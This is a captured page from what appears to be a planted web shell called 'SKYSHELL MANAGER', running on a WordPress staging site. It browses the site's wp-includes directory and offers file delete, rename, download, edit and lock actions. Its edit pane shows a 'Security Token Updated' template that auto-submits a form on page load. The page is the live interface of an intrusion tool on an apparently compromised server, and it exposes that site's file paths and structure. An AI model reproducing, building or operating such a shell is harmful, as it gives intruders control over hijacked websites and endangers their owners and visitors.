📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: tokenpassthrough
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <meta content="text/html; charset=utf-8" http-equiv="Content-type" /> <title>Security Token Updated</title> <style type="text/css"> body { font-family: arial; margin: 0; padding: 0; background: #dcf4fa; } a { color: #00566a; } * { margin: 0; padding: 0; } h1 { background: #fcb64c; padding: 15px; border-bottom: solid 10px #00566a; color: #00566a; } h2 { font-size: 16px; margin: 0; padding: 0; color: #00566a; } .formtbl, p { margin: 0 10px 5px 10px; padding: 15px; border-bottom: dashed 1px #cce5eb; } .formtbl th { border-bottom: 1px solid #000; } .pagevars { margin: 15px 0 15px 50px; padding: 20px 0 20px 50px; background: #d3eaf0; width: 70%; } .pagevars p { border: none; } li { margin: 10px 0; } </style> </head> <body onload="document.passthroughform.submit()"> <h1>Security Token Updated</h1> <p>Login credential validated. You will now be redirected to the correct URL.</p> <form action="%uri%" method="post" name="passthroughform"> <p><input type="submit" value="Continue" /> </p> %htmlized_form% </form> </body> </html>
Save